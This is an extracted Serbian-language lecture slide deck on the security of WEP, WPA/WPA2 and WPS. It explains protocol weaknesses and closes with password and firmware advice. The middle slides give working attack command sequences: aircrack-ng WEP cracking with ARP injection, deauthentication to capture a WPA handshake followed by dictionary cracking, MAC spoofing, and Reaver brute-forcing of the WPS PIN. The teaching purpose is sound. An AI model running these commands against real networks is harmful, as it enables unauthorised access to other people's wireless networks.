Download as pdf or txt
Download as pdf or txt
You are on page 1of 28

Analiza zatite beinih mrea

WEP, WPA i WPA2

Duan Stamenkovi, M.Sc.

Beograd, 2013.

Wired Equivalent Privacy


Wired Equivalent Privacy WEP (802.11):
Bezbednosni algoritam za beine mree.
Ratifikovani standard od 1999.godine
Prepoznatljiv je po svom kljuu od 10 (64bit) ili 26 (128bit)
heksadecimalnih karaktera (0-9 i A-F svaki karakter po 4 bita)
i Inicijalizacioni vektor od 24bit-a. Neki proizvoai
dozvoljavaju i klju duine 58 (256bit) heksadecimalnih
karaktera.
RC4 kao sekvencijalni algoritam za ifrovanje.
Dva tipa WEP autentifikacije:
Open System
Shared Key

Wired Equivalent Privacy


Nedostaci WEP protokola:
Inicijalizacioni Vektor se prosleuje kao obian tekst i njegova
uloga je da sprei bilo kakva ponavljanja.
Duina od 24bit-nog Inicijalnog Vektora nije dovoljno dugaka
da bi se spreilo ponavljanje na optereenoj mrei.
Pretpostavka je da e se 24bit-ni Inicijalizacioni Vektor
ponoviti na svakih 5000 paketa.
Nain upotrebe Inicijalnog Vektora dovodi do toga da WEP
protokol bude podloan napadima sa kljuem.

WiFi Protected Access


WiFi Protected Access WPA (802.11i):
Poznat kao 802.11i draft (nacrt) standard.
Ratifikovani standard od 2003.godine kao brza zamena za WEP
u iekivanju standardizacije WPA2 protokola.
Koristi Temporarl Key Integrity Protocol (TKIP) koji poboljava
pravljenje radnog kljua u odnosu na WEP protokol.
Inicijalizacioni Vektor je 48bit-a (2x dui nego kod WEP-a).
RC4 kao sekvencijalni algoritam za ifrovanje se i dalje koristi
kako bi ureaji sa slabijim hardverom podrali prelazak na
WPA jer je WEP ve okarakterisan kao nebezbedan.

WiFi Protected Access 2


WiFi Protected Access 2 WPA2 (802.11i-2004):
Naslednik WPA protokola.
Uvodi AES algoritam za ifrovanje poruka.
Postoji vie verzija ovog protokola:
WPA-Personal (Jedna od najkorienijih verzija protokola, koristi PSK
(Pre Shared Key Password).
WPA-Enterprise (802.11x). Najee se koristi u poslovnim
okruenjima i za realizaciju ove verzije protokola potreban je
RADIUS server.
WPA-WPS (Wi-Fi Protected Setup, koristi vie metoda za
autentifikaciju. Jedan od metoda je korienje PIN-a koji se nalazi
zapisan u nekom obliku na samom ruteru. PIN je osmocifreni broj,
pa je brute-force napad izvodljiv za kratko vreme).

WEP Bezbednost
Problem kod WEP protokola lei u samoj implementaciji RC4
algoritma koji se koristi za ifrovanje.
Inicijalizacioni Vektor (deo materijala za Klju) je uvek poznat i
posle nekog vremena se ponavlja, to dovodi do ifrovanja
nekih poruka sa potpuno istim Kljuem. To u kriptoanalizi
dovodi do mnogih mogunosti.
U praksi se koristi injekcija ARP paketa kako bi se skratilo
vreme za koje e se Inicijalizacioni Vektor ponoviti i samim tim
otkriti ceo Klju korien za ifrovanje paketa kao i za
autentifikaciju.
to je vei protok na mrei (izmedju nekog autorizovanog
klijenta i Access Point-a, napada e bre doi do Kljua.

Demonstracija WEP Napada Fern WiFi Cracker


BackTrack 5 distribucija Linuxa poseduje ve nekoliko
ugraenih alata koji olakavaju otkrivanje WEP kljua.
Najjednostavniji za upotrebu je fern-wifi-cracker.
Alat poseduje grafiki interfejs i u svega par klikova moe
zapoeti napad na mreu obezbedjenu WEP-om.
Fern WiFi Cracker koristi aircrack-ng grupu alata koja
predstavlja najnapredniju grupu alata kada se radi o napadima
na WEP, WPA ili WPA2 protokole. Aircrack-ng alati se pokreu
iz terminala i nisu tako jednostavni za upotrebu kao Fern WiFi
Cracker.
Vreme potrebno za pronalazak password-a mree
obezbeene WEP protokolom koja ima barem jednog
aktivnog korisnika se svodi na svega nekoliko minuta.

Demonstracija WEP Napada Fern WiFi Cracker


Fern WiFi Cracker:
Potrebno je jednostavno
izabrati karticu koju e
alat koristiti za skeniranje,
izabrati eljenu mreu za
napad i pokrenuti neki od
ponuenih napada.
Nikakvo predznanje o
samim mreama ili
protokolima nije
potrebno za korienje
ovog alata.

Demonstracija WEP Napada Aircrak-ng


Potrebni alati su iz aircrack-ng grupe.
airmon-ng (alat koji se koristi za postavljanje wireless kartice u
mod za monitoring. U ovom modu kartica moe da oslukuje
saobraaj na nekoj od mrea koje su u dometu).
airodump-ng (alat koji prati komunikaciju na zadatoj mrei i
prijavljuje kada se neki novi korisnik autentifikovao tj. Kada je
dolo do handshake-a. Ovaj alat takoe zapisuje podatke svih
poruka komunikacije na disk tako da se napad moe nastaviti bilo
kada nakon uhvaenih potrebnih podataka).
aireplay-ng (alat koji omoguava slanje odreenih paketa ka
mreama na koje se napada nije autentifikovao. Dozvoljava
slanje paketa za nasilnu deautentifikaciju klijenata kako bi ih
prisilio na ponovno autentifikovanje).
aircrack-ng (alat za pronalaenje kljua).

Demonstracija WEP Napada Aircrak-ng


Komande koje emo koristiti:
airmon-ng - Pregled mrenih adaptera
airmon-ng start wlan0 - Pokretanje beinog adaptera i kreiranje monitoring ad.
airmon-ng stop intX - Gaenje odreenog adaptera
ifconfig mon0 down - Gaenje monitoring adaptera
macchanger -m 00:11:22:33:44:55 mon0 - Promena MAC adrese monitoring ad.
ifoncig mon0 up - Pokretanje monitoring adaptera
airodump-ng wlan0 - Pretraivanje svih raspoloivih beinih mrea
airodump-ng -w naziv_fajla -c broj_kanala --bssid mac_adresa_ap --ivs mon0 Suavanje pretrage na beinu/e mreu/e na odreenom kanalu i beleenje
informacija u odreenom fajlu
airodump-ng -w zrmWEP -c 11 --bssid 00:22:6B:EF:B1:30 --ivs mon0 -Primer
prethodne komande
aireplay-ng -1 0 -a mac_adresa_ap mon0 -Postavljanje MAC adr. AP-a i slanje
paketa za autorizaciju korisnika.
aireplay-ng -3 -b mac_adresa_ap mon0 -Serijsko slanje paketa na MAC adr. AP-a
aircrack-ng naziv_fajla-0?.extenzija - Pokretanje razbijanja lozinke na osnovu
pristiglih paketa
aircrack-ng zrmWEP.ivs - Primer prethodne komande

Demonstracija WEP Napada Postavljanje


virtualnog adaptera u reim rada za monitoring

Demonstracija WEP Napada Skeniranje svih


aktivnih beinih mrea u dometu

Demonstracija WEP Napada Postavljanje


virtualnog adaptera da oslukuje saobraaj
odabrane mree

Demonstracija WEP Napada Slanje zahteva za


autorizaciju i serijsko slanje ARP zahteva

Demonstracija WEP Napada Klju

WPA i WPA2 Bezbednost


Kod odreenih implementacija WPA protokola, postoji propust
koji omoguava napadau da deifruje delove saobraaja izmeu
Access Point-a i korisnika.
Propust su otkrili Nemaki naunici Eric Tews i Martin Beck.
Ovaj napad je unapreen od strane vie naunika ali ni u jednoj
verziji ovog napada nije mogue doi do samog Kljua
passworda, koji se koristi za autentifikaciju i ifrovanje poruka.
WPA se i dalje smatra bezbednim protokolom i u normalnoj je
upotrebi. Viestruko je bri od WPA2 protokola, pa je samim tim i
jedini izbor na nekim starijim Access Point-ima.

WPA i WPA2 Bezbednost


Poznato je da je jedini nain za napad na mree obezbeene WPA
i WPA2 protokolima, koji omoguava pronalazak Kljua
passworda, brute-force napad ili napad po reniku.
Jedini nain za izvoenje ovakvog napada je nain koji
podrazumeva hvatanje handshake poruka izmeu korisnika koji
pristupa mrei, a zna password za pristup, i Access Point-a.
Najnapredniji alati za realizaciju ovog napada su aircrack-ng grupa
alata, korieni na nekoj od distribucija Linux operativnog
sistema.

Demonstracija WPA/WPA2 Napada Aircrak-ng


Komande koje emo koristiti:
airmon-ng - Pregled mrenih adaptera
airmon-ng start wlan0 - Pokretanje beinog adaptera i kreiranje monitoring
airmon-ng stop intX - Gaenje odreenog adaptera
ifconfig mon0 down - Gaenje monitoring adaptera
macchanger -m 00:11:22:33:44:55 mon0 - Promena MAC adrese monitoring ad.
ifoncig mon0 up - Pokretanje monitoring adaptera
airodump-ng wlan0 - Pretraivanje svih raspoloivih beinih mrea
airodump-ng -w naziv_fajla -c broj_kanala --bssid mac_adresa_ap --ivs mon0 Suavanje pretrage na beinu/e mreu/e na odreenom kanalu i beleenje
informacija u odreenom fajlu
airodump-ng -w zrmWPA -c 11 --bssid 00:22:6B:EF:B1:30 --ivs mon0 -Primer
prethodne komande
aireplay-ng -0 1 -e naziv_ap c mac_adresa_korisnika mon0 Postavljanje naziva
AP-a i slanje jednog test paketa gde -0 oznavaava deautorizaciju korisnika
aireplay-ng -3 -b mac_adresa_ap mon0 -Serijsko slanje paketa na MAC adr. AP-a
aircrack-ng -w '/root/Desktop/darkc0de.lst' '/root/Desktop/root/zrmWPA-01.ivs

Demonstracija WPA/WPA2 napad Postavljanje


virtualnog adaptera u reim rada za monitoring

Demonstracija WPA/WPA2 napad Skeniranje


svih aktivnih beinih mrea u dometu

Demonstracija WPA/WPA2 napad Postavljanje


virtualnog adaptera da oslukuje saobraaj
odabrane mree

Demonstracija WPA/WPA2 napad Slanje paketa


za deautorizaciju korisnika i prikaz ponovne
autorizacije (WPA handshake)

Demonstracija WPA/WPA2 napad Postavljanje


napada renikom i traena lozinka

WPA i WPA2 Bezbednost


Napad se izvrava jednostavno ak i uz minimalno poznavanje Linux okruenja.
Najslabija komponenta napada, i u isto vreme komponenta od koje zavisi uspeh
napada je renik.
Moemo koristiti i renike koji imaju milione rei, a da i pored toga ne
pronaemo lozinku mree koju napadamo.
Sa druge strane pretraga po takvom reniku zahteva puno vremena (nekada se
moe meriti i u danima), i i dalje postoji mogunost da taj renik ne sadri
lozinku kojim je zatiena mrea.
Za sigurno uspean napad potrebno je koristiti brute-force metod pretrage. To
je metod koji e isprobati sve mogue kombinacije sa zadatim alfabetom za
zadatu duinu rei lozinke. Ovaj metod je toliko vremenski zahtevan da
jednom prosenom raunaru treba 4 dana da isproba sve kombinacije malih
slova engleskog alfabeta sa duinom rei od 6 karaktera koristei alat HashCat.
aircrack-ng ne poseduje brute-force metod napada.
Mogue je exportovati uhvaene handshake poruke u neki od formata koji
koriste alati za brute-force pretragu.
Jedan od najpoznatijih alata koji poseduje mogunost brute-force pretrage je
HashCat. Poseduje grafiki interfejs i mnogo prednosti vezanih za samu
pretragu u odnosu na aircrack-ng.

Wi-Fi Protected Setup (WPS)


Opcija koja postoji na veini rutera.
Osnovna podeavanja WiFi rutera dozvoljavaju autentifikaciju
korisnika putem PIN-a (osmocifreni broj zapisan na ruteru)
paralelno sa WPA ili WPA2 lozinkama.
Ranjivost ovog sistema bezbednosti je evidentna, jer ciljani napad
moe lako razbiti PIN od osam cifara.
Strpljenje napadaa je od presudnog znaaja.
Neki od alata koji se koriste za napad su:
Reaver (sporiji, podrava sve WiFi ureaje)
WPScrack (bri, podrava samo najpoznatije brendove)

Demonstracija WPS napad Reaver


Komande koje emo koristiti:
apt-get update && apt-get install reaver (dolazi sa BT5 RS3)
airmon-ng start wlan0 (dodavanje monitoring adaptera)
wash i mon0 (pregled dostupnih AP sa otkljuanim WPS-om)
airodump-ng mon0 (uzimamo MAC adresu ciljanog AP-a)
reaver i mon0 b 00:1E:E5:64:95:77 vv (napad)
Posle odreenog vremena, dobiemo povratnu informaciju o PINu za autentifikaciju, ali i lozinku za WPA/WPA2 nain pristupanja.

WPA i WPA2 Bezbednost

Zato to se bezbednost WPA i WPA2 protokola zasniva na jaini lozinke (broj


karaktera, originalnost lozinke), potrebno je smiljati lozinke koje se sastoje od
karaktera i znakova koji se u takvoj kombinaciji ne mogu nai u reniku nekog
jezika (poto iz takvih renika potie veina rei u renicima za napad). Dakle
potrebno je praviti komplikovane lozinke koje sa druge strane ljudi mogu lako
pamtiti. Kako to izvesti?

Npr. Lozinka Singidunum ili password predstavlja re koja e se lako nai u


nekom reniku (bilo u reniku sastavljenom samo za napade, bilo u normalnom
reniku engleskog ili srpskog jezika), pa tako predstavlja re koju e napada sa
velikom verovatnoom otkriti.

Ako bismo umesto Singidunum kao lozinku upisali npr. s1ng1dynym, mi


bismo je opet lako zapamtili, ali se kao takva sigurno ne bi nala ni u jednom
reniku. Jedini nain da se ovakva lozinka pronae bi bilo korienje bruteforce metoda pretrage to bi za ovih 10 karaktera, koristei alfabet i brojeve, na
jednom raunaru trajalo i due od godinu dana = neizvodljivo!

WPA i WPA2 Bezbednost


Sa druge strane, veliki problem bezbednosti ovih protokola pravi
WPS, koji je izuzetno ranjiv. PIN je hard code-ovan u firmware-u
svakog WiFi ureaja koji poseduje WPS opciju.
ak i ako ga onemoguimo, napad putem Reaver-a ili slinog alata
je mogu i za krae vreme uspean.
Filtriranje po MAC adresama? Napada uvek moe lairati svoju
adresu i preuzeti neiju ko je ve autentifikovan na ciljanu mreu.
U prednosti su korisnici iji WiFi ureaj nema opciju za WPS, a oni
iji ureaj ima ovu opciju, preporuka je zamena fabrikog
firmware-a sa kastomiziranim kao to je npr. DD-WRT koji sam po
sebi nema WPS kao opciju, a nudi vei broj drugih opcija (VPN)
koje fabriki ne podrava.

You might also like